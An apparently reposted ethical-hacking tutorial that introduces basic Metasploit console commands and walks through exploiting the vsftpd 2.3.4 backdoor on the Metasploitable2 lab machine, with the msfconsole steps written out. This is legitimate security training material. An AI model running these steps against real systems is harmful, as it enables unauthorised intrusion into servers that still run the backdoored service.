SERVER SIDE ATTACKS - METASPLOIT
Metasploit is an exploit development and execution tool. It can also be used to carry out other penetration testing tasks such as port scans, service identification and post exploitation tasks.
> msfconsole - runs the metasploit console
> help - shows help
> show[something] - something can be exploits, payloads, auxiliaries or options.
> use[something] - use a certain exploit, payload or auxiliary.
> set [option][value] - configure [option] to have a value of [value]
> exploit - runs the current task
Target: Metasploitable2
Tool: Zenmap, Metasploit on Kali Linux
Scan the target machine, and find the vsftpd. You can find the backdoor on this application.(https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor)
Exploit the target machine follow below steps.
msf > use exploit/unix/ftp/vsftpd_234_backdoor msf exploit(vsftpd_234_backdoor) > show targets ...targets... msf exploit(vsftpd_234_backdoor) > set TARGET < target-id > msf exploit(vsftpd_234_backdoor) > show options ...show and set options... msf exploit(vsftpd_234_backdoor) > exploit
Now exploit the target machine sucessfully.
Ethical Hacking - GAINING ACCESS(4)
原文:https://www.cnblogs.com/keepmoving1113/p/12099086.html